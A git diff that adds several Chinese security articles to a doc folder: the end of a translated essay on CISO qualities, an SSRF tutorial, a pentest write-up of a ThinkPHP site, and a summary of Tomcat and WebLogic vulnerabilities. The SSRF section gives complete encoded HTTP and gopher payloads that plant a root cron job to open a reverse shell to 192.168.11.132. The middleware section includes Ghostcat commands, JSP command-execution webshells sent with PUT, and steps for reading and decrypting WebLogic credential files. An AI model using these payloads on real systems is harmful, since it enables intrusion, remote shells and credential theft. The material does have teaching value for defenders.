+然而,当组织未能充分理解CISO的角色时,可能会导致职位描述不匹配,并列出一系列与CISO必须匹配的技术能力,从而使情况变得复杂。 + +O’Leary认为,组织需要了解CISO是如何运作的、CISO将与谁接触以及CISO将与谁密切合作。在某些情况下,像O’Leary这样的招聘人员可能会解释,如果候选人拥有更多样化的经验,哪怕他们的任期较短或在一家组织的经验不符合职位模板,他们仍能胜任这个角色。O’Leary强调:“如果有人接触过许多不同的行业、挑战和业务类型,那么他们的经验就会更加全面。” + +O’Leary认为,成长心态和适应性等个人品质将使CISO在这种多变的环境中茁壮成长。“任何优秀的CISO都会把此职位看作是一个正在进行的工作,而不是一个完成的作品,因为他们需要随着角色的发展而不断进步。” + +所有人都会共识,对于CISO来说,其决定性的因素是激情,即对角色的激情和对确保组织安全的激情,这才是优秀CISO的核心。O’Leary总结道:“这种激情是重要的个人动力,并且在团队中具有传染性,有助于激发组织上下对保护组织、客户和员工的使命和信心。因此,优秀的CISO始终会对网络安全充满热情,并致力于终身学习和改进。” + + +**国内安全专家的建议** + + + +优秀的CSO/CISO需要具备哪些特质?又是什么能够成就这些特质?国内安全专家如此建议。 + +**owasp广东负责人刘志诚** +表示,对优秀的CSO/CISO而言,首先是业务能力,要对企业的业务具备充足的了解,包括目标、资源、流程、风险、核心竞争力等,只有了解业务,才能做好业务的支撑,在保持目标一致的情况下,协调安全风险达成共识,落实安全控制措施。 + +其次是全栈的技术体系能力,信息化技术日新月异,没有足够的全栈技术视野,在风险识别与判断,安全控制措施能力建设和运营落地的场景化上有所欠缺,很难构建主动防御纵深防御的安全防线。 + +第三,通用的管理能力,项目能力,产品能力,沟通、协作、预算,成本,产业互动,分享传承,无论是文字还是语言,对一个CSO而言,都需要全面而综合的素质与管理能力,如果缺少其中的关键环节,必须主动学习,快速补足。 + +第四,要具备安全的全局的知识架构和实践经验,显性知识体系有很多路径,学历、证书,体系化的学习可以获得,隐性知识需要长期沉浸、萃取、提炼、抽象、总结,形成自己的全局的安全观,并且持续学习,维持知识库的更新。“经验这个事情,很多时候需要机会去体验和历练,当然,分享案例和实践书籍都是成长路上不可或缺的精神食粮。这一点需要积累、沉淀,很难速成,这也是为什么安全负责人这么稀缺的关键原因。” + +![](https://mmbiz.qpic.cn/mmbiz_png/5eH7xATwT38W6GuVaNvnF21icAdlibLoTf5IuGTVs2hS3RAJjh1nHyP20MAF1oNcUibK9IBTtYdRef4rb5XbibjuiaQ/640?wx_fmt=png&from=appmsg "") + + +**某集团 IT安全负责人李晓文** +表示,企业面临很多的商业风险,从Cyber Security的视角来看, CSO/CISO要应对的是信息资产被“窃”、数字化的业务流程被蓄意破坏等导致企业遭受直接或间接的经济损失,在数字化转型的大背景下,优秀的 CSO/CISO必须让安全成为业务及在线流程的一部分,简述需要具备的能力如下: + +![](https://mmbiz.qpic.cn/mmbiz_png/5eH7xATwT38W6GuVaNvnF21icAdlibLoTf980C66ibSWDFKHce4aedok4a3rRVt8m7EtLBm2NH2NyGvkEweia4CsZw/640?wx_fmt=png&from=appmsg "") + +[ 1] 理解并承接业务战略的能力:安全已成为不可脱离的部分,是业务基本保障不可缺少的一部分,至少要从支持业务发展、降低商业风险、遵从法律法规三个方向来负责安全相关的事宜,并将承接后的战略转化为战术项目。 + + +[ 2]风险评估的能力:基于治理体系的模式,熟悉和理解业务,并立足科学的而非主观的风险评估,确保安全决策的投资收益比,安全技术能力的实施应适度超前,结合情报,构建持续的主动防御以更快响应可能新出现的威胁。 + + +[ 3]持续学习的能力:理解企业的基础投资和技术创新,无论是企业的研发或是企业的IT,数字化的进程中,有些创新技术会带来颠覆性的改变,如何保护因这些技术创新产生的商业秘密或因此伴生的风险,需要持续学习和敏锐的洞察力。 + + +[4 ]沟通能力:向上沟通-将战略承接转换为有数据支撑且可视的价值以持续的获取管理层的投资;横向沟通-服务和保障业务,横向拉通业务对安全的持续理解和认可;向下沟通- 赋能团队,一支善于作战和持续成长并产生合力的专业团队是业务信赖的基石。 + + +[ 5]组织能力:应急响应不仅仅是团队的应急预案和日常演练,如何提高跨部门的应急响应能力更至关重要,需及时响应入侵攻击,最小化对业务的影响或破坏,应组织跨部门的模拟演练,以提升企业实时的响应能力。 + +**某证券机构安全负责人蒋琼** +表示,优秀的CSO/CISO需要具备安全或泛安全如风控合规审计方面专业基础,同时对于人员管理方面需要有足够的理论包括实践积累。“安全是个壁垒较高的行业,作为CSO尤其需要懂得尊重技术尊重人才,尊重安全本身具有的复杂性特点。当然,分析力、逻辑力、表达力,这几项管理类人才在职场上的能力项都是成为一名优秀的CSO所要具备的核心能力。” + +**某集团安全专家梁龙亭** +表示,有自驱动力、不断学习、不断超越自我的人群更适合担任CSO/CISO,因为信息技术不断发展,攻击手段不断更新,魔高一尺,CSO/CISO必需道高一丈。CSO/CISO可以不必直接与黑客开展对抗,但是针对黑客的攻击,必须熟知市场上有哪些解决方案,各个解决方案的优缺点也要能够独立判断,一旦需要购买相关产品或者服务时,CSO/CISO要能够为公司找到性价比最高的解决方案。 + +此外,梁龙亭认为渗透测试人群更可能成为CSO,一是具有“技术安全”的实操能力,再辅以“管理安全“的系统思维,研究学习所有安全相关的“法律法规”,就具备了CSO的三大经典能力。从技术走来的CSO/CISO,顺流而下,左右逢源,一泻千里;CSO/CISO最终会去实向虚,形成“安全哲学”,成长为安全思想“大家”;而从审计、安全认证咨询走来的CSO/CISO,艰难走向“技术安全”这座大山,逆流而上,且进且退,避实就虚,终将难以名副其实。 + +原文地址: + +What makes a great CISO | CSO Online + + +作者: + +Rosalyn Page  网络安全领域的记者 + + + + +**END** + + + + + + +![](https://mmbiz.qpic.cn/mmbiz_jpg/5eH7xATwT3icpLmjpDSQkXx16oAygiaJncnia0kl72sBlgJQlKdaWJ6GQnULdjmQ7McMvLAUBmCOeXnSkHjjM5QSQ/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") + + +点击这里阅读原文 + diff --git a/doc/一文读懂SSRF漏洞.md b/doc/一文读懂SSRF漏洞.md new file mode 100644 index 00000000..54b8bcf5 --- /dev/null +++ b/doc/一文读懂SSRF漏洞.md @@ -0,0 +1,168 @@ +# 一文读懂SSRF漏洞 +simple学安全 simple学安全 2024-11-20 10:56 + +目录 + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKz5ulJQIic4ickzQM8DBLKpwsVfibrbZQ1vhyCIs7yAB7CCiaRhzxg03QccQ/640?wx_fmt=png&from=appmsg "") + +简介 + +SSRF全称服务器端请求伪造,是一种由攻击者构造请求,由服务器端发起请求的漏洞,正由于这一点,SSRF攻击的目标是外网无法访问的内网系统。 + +漏洞出现的原因是web应用程序提供了从其他服务器应用获取数据的功能,却没有对目标地址做过滤和限制。导致存在漏洞的应用成为攻击者的跳板机。 + +漏洞利用 + +1、**读取服务器本地文件** + +利用 +file协议 +可以读取本地文件: +``` +Windows: +file://127.0.0.1/c:/ 访问本地C盘 +file://localhost/d:/ 访问本地D盘 +file:///e:/ 访问本地E盘 + +Linux: +file:///etc/hosts +``` + +现有 http://192.168.1.128/ssrf.php?url= 存在SSRF漏洞,可利用file协议读取本地文件: +``` +?url=file:///c:/windows/win.ini +?url=file://127.0.0.1/c:/windows/win.ini +?url=file://localhost/c:/windows/win.ini +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzYu8lW8iaibVHX2jwrpUT3PshdcSTfqfiaoBSQFc0JUalB8YsW6pg7BflA/640?wx_fmt=png&from=appmsg "") + +2、**收集内网信息** + +方法一:直接将参数值设置为内网地址,附带端口号,判断内网主机端口开放情况,这里探测到服务器开放3306端口 +``` +?url=127.0.0.1:3306 +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzMwh3es6q69gyyHQzXru3PmhM3Bmwklib5PicEAlhLjnibnSCmcVkpbbgw/640?wx_fmt=png&from=appmsg "") + +方法二:利用 +dict协议 +探测端口,dict协议格式如下: +``` +dict://ip:port/命令:参数 +``` + +其中命令和参数不是必须的。 + +使用dict协议探测到服务器开放3306端口: +``` +?url=dict://127.0.0.1:3306/ +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzMB6ERHUzoWGkXZLTuyFyjnbXxp3tyt7ex1nCicf86QJuJ8iak7zxg3zg/640?wx_fmt=png&from=appmsg "") + + +3、**攻击内网redis** + +ssrf漏洞常用于攻击内网redis服务,可先使用file协议读取服务器的网络配置文件,获得内网ip以及子网掩码,随后使用收集内网信息的方法探测内网的redis服务,常用端口6379。这里探测到172.19.0.2存在redis服务 + +方法一:利用http协议 + +1)redis是通过换行符区分每条命令的,可以使用%0d%0a代表换行符,达到一次传入多条命令的目的,利用redis写计划任务反弹shell: +``` +set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/192.168.11.132/4444 0>&1'\n\n\n\n" +config set dir /etc/ +config set dbfilename crontab +save +``` + +2)特殊字符进行url编码,换行符使用%0d%0a: +``` +set%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave +``` + +3)拼接前还需要在前后加上一些字符表示开始和结束: +``` +开头:start%0d%0a%0d%0a +结尾:%0d%0a%0d%0aend + +其中start和end可以是任何字符串,没有要求 +``` + +4)得到最终payload +``` +start%0d%0a%0d%0aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0d%0a%0d%0aend +``` + +5)发送攻击请求包,成功反弹shell +``` +?url=http://172.19.0.2:6379/start%0d%0a%0d%0aset%201%20%22%5Cn%5Cn%5Cn%5Cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.11.132%2F4444%200%3E%261'%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0d%0a%0d%0aend +``` + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzGzJOQApw2SeNib48xEM7SHCazv1rLVficvZ57ZlqfdHv0AQOSFT4Zpibw/640?wx_fmt=png&from=appmsg "") + +方法二:利用 +gopher协议 +攻击内网redis,gopher协议可以构造任意的tcp/ip数据包,格式如下: +``` +gopher://ip:port/_数据 +``` + +1)可用如下工具生成反弹shell的payload: + +https://github.com/tarunkant/Gopherus + +![](https://mmbiz.qpic.cn/mmbiz_png/icjPTM4gYeU9QD61S9PKSqEcjVjSNztKzgaLoA92cae4Aiadm3enH3er0wlOlN9yvMaC4mBcAibCgE7CofISlKdvg/640?wx_fmt=png&from=appmsg "") + +其中127.0.0.1:6379要换成实际的存在redis服务的地址。 + +2)由于服务端接受数据后会自动进行一次url解码,为了保持结构完整,需要对gopher协议的数据再进行一次url编码 +``` +gopher://192.168.11.132:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A%2F1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.11.132%2F1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A%2Fvar%2Fspool%2Fcron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A +``` + +3)最后作为参数发送请求包 +``` +?url=gopher://192.168.11.132:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A%2F1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.11.132%2F1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A%2Fvar%2Fspool%2Fcron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A +``` + +绕过技巧 + +1、**本地回环地址** + +将本地回环地址http://127.0.0.1/改为http://127.1/ + +2、**双重URL编码混淆** + +对请求的url进行双重url编码,例如http://127.1/admin改为http://127.1/%2561dmin,对a进行了双重url编码。 + +3、**"@"符号绕过** + +该绕过的原理是http:// +127 +.0.0.1 +/a +dmin与http://xxx.com@127.0.0.1/admin +这两个请求是 +一样的 +, +也就是说 +对于限制了域名的网站,可以通过这种方法实现绕过 + +修复建议 + +1、限制请求的端口只能为web端口,例如80、8080 + +2、只允许发起http和https的请求 + +3、采用白名单的方式限制访问的目标地址,禁止访问内网ip + +4、屏蔽返回的详细信息 + +END + +**查看更多精彩内容,关注** +**simple学安全** + + diff --git a/doc/一次黑盒转变白盒前台漏洞审计过程.md b/doc/一次黑盒转变白盒前台漏洞审计过程.md new file mode 100644 index 00000000..eb0c26a4 --- /dev/null +++ b/doc/一次黑盒转变白盒前台漏洞审计过程.md @@ -0,0 +1,81 @@ +# 一次黑盒转变白盒前台漏洞审计过程 +原创 Ambition 进击安全 2024-11-20 06:11 + +**免责申明** + +本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。 + + +**一、前言****** + +    在一天跟某位师傅闲聊的时候,突然给了一个站点,说自己的项目打不下,然后有了这个文章。 + +**二、黑盒测试****** + +**** +在拿到站点的时候,发现目标网站是一个经典的登录框,并且也没有账号。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzpRxMahc3mHKicLKvaw4xxOQrokdbbPyW6T6nQJDu4rLuicf5jGg5LkvA/640?wx_fmt=png&from=appmsg "") + +最终在经历漫长的第一次手工爆破就进去了。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzk3dhBMuIb0Y7CR0uybhaAYOicfFjMr11TCUkc662lJwEicmPz33EmJkQ/640?wx_fmt=png&from=appmsg "") + +最终找到上述上传点,可以直接进行上传一句话,但是一个漏洞肯定是不够交差的,于是这里开始了白盒之路。 + +**三、白盒测试****** + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzbIw81ztmVahWbicbTRvX9kmRdbkv8hUibTQUicLl9Xxt1Muicer3icbrFGA/640?wx_fmt=png&from=appmsg "") + +拿到源码之后其实可以直接看出来是ThinkPHP开发的,这里先定位我们的上传点。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzx5BLFaKqiccTicY2lHObeloz86c5ctjGVycia89wSu5aSHEZuuj1Wob4A/640?wx_fmt=png&from=appmsg "") + +根据路径进行定位到相关方法处。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzXQrnbZJCIs7DTNMkicOqrkWicKlibdFubn9IiaYfUZ3vDia3YZn7pGGCPMQ/640?wx_fmt=png&from=appmsg "") + +可以看到直接进行了相关的上传,跟入方法local方法。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzt3Zic3ejYiaFyc5uKTlI536KkCZiaibacTcC2lYYnM9q8zBMxkhfgPyfIQ/640?wx_fmt=png&from=appmsg "") + +可以看到也没有什么过滤,我们可以直接上传相关文件,其中record只是获取到一些文件信息,但是我们的目的还是分析别的漏洞。 + +这里直接看前台功能发现一个地方存在泄露。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzcbCIPC6FP2S5CMUmplFbnQ29E66FnlaeJQ1wicHtjPKsyZibavTcVFhg/640?wx_fmt=png&from=appmsg "") + +这里传递一个参数为sid并且放入数据库查询并且返回出来了相关信息,尝试验证一下。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLz9J0KDdxdIFPzPN0oBMQtA5UOQo5DA3yPw6sRvqhKVHElSy1JH2OytQ/640?wx_fmt=png&from=appmsg "") + +连续试了好几个豆没找到,这里重新回去看代码。 + +**四、加解密脚本编写****** + +**** +这里查看代码发现对于传入的参数进行了后端的加解密,如下图。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLz6LhNmgOknn5fQT6zs53GFsHvdPKfeTTo3zWgzISiassrQk8NlTnge8Q/640?wx_fmt=png&from=appmsg "") + +其中讲传入的参数放入到了hou_dycrypt当中进行了解密,那我们传递的一定要是加密的信息,这里跟入方法查看,一般加解密的方法都是在一个类当中存放的。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzn0NIZqBv6aDT58abKhANcuPiaDDJm9hC33MKEj3AwLgU60qaXicseZvg/640?wx_fmt=png&from=appmsg "") + +通过名称可以发现一个加密一个解密,这里将代码摘取下来测试。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzMIulQo1ict0StUX80t84Zw8XLDPhicXPJVibIgHZsRuOveKc9V16BLLNg/640?wx_fmt=png&from=appmsg "") + +传入加密值测试。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzDog3WkfWtQnAdO9cF1vUjfIhst9Tx9cgFiadCF4qvIptlsjHibxt3jyQ/640?wx_fmt=png&from=appmsg "") + +哦吼!,还有一个图片地址,是个人照片,漏洞+1! + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ZRKuxIKRyhWFK2sAGq7icJzuBzVN2WyLzjKkKR7tS7kl1BYbblZBJWhcZibvxUCYda2BgfYDicR0eEjwIsIPg6ovA/640?wx_fmt=png&from=appmsg "") + +**五、完结** + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/ZRKuxIKRyhXhuxbCGecu4ibia3kSXD8ePQHrSvPSNtC7PmjzQwR88Hu0LpuXdQzamKBCPAXX82anLS8f0FF3LzzQ/640?wx_fmt=jpeg "") + + diff --git a/doc/中间件常见漏洞总结.md b/doc/中间件常见漏洞总结.md new file mode 100644 index 00000000..6de75bda --- /dev/null +++ b/doc/中间件常见漏洞总结.md @@ -0,0 +1,357 @@ +# 中间件常见漏洞总结 +原创 LULU 红队蓝军 2024-11-20 10:07 + +# 1、Tomcat +## 弱口令导致war远程部署getshell + +**影响版本**:无 + +漏洞复现:通过弱口令登录,使用哥斯拉生成一个木马,上传getshell。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RE0lAOOexmTGer8uSciak8fUkcA3CWg6n7ibEh4aTOMHYpmHKY6BCj9Yw/640?wx_fmt=png&from=appmsg "") + +点【取消】按钮,跳转至如下页面 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RnIAwAmKsLNSozXrxBcdgs72mDjxrtqadqVZ4YLlic6bvGian10gD56Vg/640?wx_fmt=png&from=appmsg "") + +根据页面提示信息,在tomcat目录下,找到conf文件夹,然后找到tomcat-users.xml文件。 + +如图红色框里的几行代码,红框1里的是用户在安装tomcat时设置的密码,如果用户在安装时未设定密码则如红框2里的显示。username是账户,password是密码。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RfK2SeHgwzNkibr3r1LxkXU4jWibmDuqEFhEgaVUSUCWkic08Yhp3lVBtQ/640?wx_fmt=png&from=appmsg "") + +使用哥斯拉声生成木马 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4ReYRus6DTaJPiaBvObdFACteUm1QazqLxMKucOH7PuCWZqgic1u6LtINg/640?wx_fmt=png&from=appmsg "") + +得到ws.jsp木马文件,将ws.jsp 压缩ws.zip,在一次压缩ws.war后,进行上传 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RM3icXTyJuJ6pugH1IicicSWBpYK3iaegNX5KYZUGdug8U6YxhsP2ciayicIw/640?wx_fmt=png&from=appmsg "") + +访问是否上传成功 + +/ws解压后得到ws.jsp  ,所以访问ws/ws.jsp + + +哥斯拉链接成功 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RWia06eOCZDkkunNdl1ucSSCH11gklo9oZHd9FoR3ADEpaLMVUlibLBiaw/640?wx_fmt=png&from=appmsg "") +## 文件包含漏洞(CVE-2020-1938) + +**漏洞描述:**默认情况下,Apache  Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache  Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件,将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响(tomcat默认将AJP服务开启并绑定至0.0.0.0/0). + +**影响范围** +``` +Apache Tomcat 9.x < 9.0.31 + +Apache Tomcat 8.x < 8.5.51 + +Apache Tomcat 7.x < 7.0.100 + +Apache Tomcat 6.x + +``` + +**前提条件:** + +对于处在漏洞影响版本范围内的 Tomcat 而言,若其开启 AJP  Connector 且攻击者能够访问 AJP Connector 服务端口的情况下,即存在被 Ghostcat 漏洞利用的风险。注意  Tomcat AJP Connector 默认配置下即为开启状态,且监听在 0.0.0.0:8009 + +**漏洞原理** + +Tomcat 配置了两个Connecto,它们分别是 HTTP 和 AJP :HTTP默认端口为8080,处理http请求,而AJP默认端口8009,用于处理 AJP  协议的请求,而AJP比http更加优化,多用于反向、集群等,漏洞由于Tomcat  AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件以及可以包含任意文件,如果有某上传点,上传图片马等等,即可以获取shell + +**漏洞危害:** + +攻击者可以读取 Tomcat所有  webapp目录下的任意文件。此外如果网站应用提供文件上传的功能,攻击者可以先向服务端上传一个内容含有恶意 JSP  脚本代码的文件(上传的文件本身可以是任意类型的文件,比如图片、纯文本文件等),然后利用 Ghostcat  漏洞进行文件包含,从而达到代码执行的危害 + +**漏洞复现** + +1、下载链接:https://github.com/backlion/CVE-2020-1938/blob/master/apache-tomcat-8.5.32.zip + +2、安装JDK,并配置环境 + +3、启动tomcat,点击tomcat目录/bin 文件夹下的startup.bat + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4R7KQxkaZhDVG550a3vnK6ru5YJGaMQlFTibJ7Lkhv4rlnrjVuhUATlEw/640?wx_fmt=png&from=appmsg "") + +**任意文件读取** + +可以读取webapps目录下的任何文件 +``` + python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.9 -p 8009 -f WEB-INF/web.xml + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RZHYNaF91xDR2NiblaDPjCVYg2uxgwTKmobKNUpVjocB7cW80IIIfbhQ/640?wx_fmt=png&from=appmsg "") + +任意文件包含 + +1、首先得上传一个要包含的文件内容,并将文件上传到webapps目录 + +test.txt +``` +<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%> + +``` + +2、访问该文件内容test.txt + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RibRia6HZGwbpib5pJTv09KiarVkNb1uI5NI8fQgMadMUrQdJy3dcVQVUvQ/640?wx_fmt=png&from=appmsg "") + +3、输入命令,执行命令 +``` +python3 cve-2020-10487-v1.py 192.168.1.9 -p 8009 -f exec.txt --rce 1 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RzVCwfU00ekrJFRUu7oVdCxuwdxDomibHwBQZ7zaAObP7enlntNfMGOQ/640?wx_fmt=png&from=appmsg "") +## 文件上传漏洞(CVE-2017-12615) + +**漏洞原理** + +当 Tomcat 运行在 Windows 主机上,启用了 HTTP PUT 请求方法,可以通过构造请求向服务器上传包含任意代码的 JSP 文件,导致 JSP 文件中的代码能够被服务器执行 + +**影响范围:** + +Tomcat 7.0.0 - 7.0.81 + +**漏洞描述**:Apache Tomcat 7.0.0 - 7.0.79漏洞产生原因:在这个Dockerfile文件中,通过修改web.xml文件来添加一个名为readonly的参数,其值为false + +**漏洞复现:** + +靶场搭建可以直接使用vulhub + +可以看到readonly值为false + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4Rf40oL48BHEhRRGUNRwxYnuHGXshpzSEJ6vwakMtztdWDtJAVmWb4tg/640?wx_fmt=png&from=appmsg "") +``` +PUT /1.jsp/ HTTP/1.1 +Host: your-ip:8080 +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 5 + +<% +    java.io.InputStream is = Runtime.getRuntime() +                            .exec(request.getParameter("command")) +                            .getInputStream(); +    int a = -1; +    byte[] b = new byte[2048]; +    while ((a = is.read(b)) != -1) { +        out.print(new String(b)); +    } +%> + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RD8nxwQicibkm5TJNCpFmBQJzFQLnca25kDzCFHH3JpT41auLTC2icY4Zg/640?wx_fmt=png&from=appmsg "") + +访问,即可执行任意命令 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RPTOEHno2TicOMRkWHxtygbKA3VbfKsOjAZGVibVMSZ3qiacBpsj13fWwA/640?wx_fmt=png&from=appmsg "") +# 2、Weblogic +## 任意文件读取漏洞 + +**漏洞原理:**路径下存在任意文件读取: /hello/file.jsp?path=/etc/passwd + +**影响范围:** +``` +Weblogic 10.3.6.0 +Weblogic 12.1.3.0 +Weblogic 12.2.1.2 +Weblogic 12.2.1.3 + +``` + +**漏洞复现** + +通过/etc/passwd读取用户信息 + +http://xxx:7001/hello/file.jsp?path=/etc/passwd + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4R5zkFHFkmYUBB80dLolJv3z3dOdZZMprRHYun5wUaRENtn5g9P55GFQ/640?wx_fmt=png&from=appmsg "") + +1、读取密文文件 + +读取配置文件拿到加密密钥: +``` +/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4R3Gc4dv1TSKbrASl3uRm3kSaibSnuRJac2p2SwxyJ1cfdtWNDIv1DcMg/640?wx_fmt=png&from=appmsg "") + +2、读取加密后的密码 + +使用burp抓包后,并将密码存储为.dat文件 +``` +/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4RVJSJZwDILRdUico1zqvfbUeLZAAxOf9WnpNjypp5DL7cXpXdMBNm0ng/640?wx_fmt=png&from=appmsg "") + +将读取的文件内容生成文件 + +3、解密 + +https://github.com/TideSec/Decrypt_Weblogic_Password + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v7HkfId2mESp4HOrdtcDA4R0jF8X6AToibbD12c6owKdicAFXn5ytUFVUc6etoy5tjrmHSYA2OtXFdA/640?wx_fmt=png&from=appmsg "") +## 远程命令执行漏洞 + +CVE-2020-14882: 代码执行漏洞 + +远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。 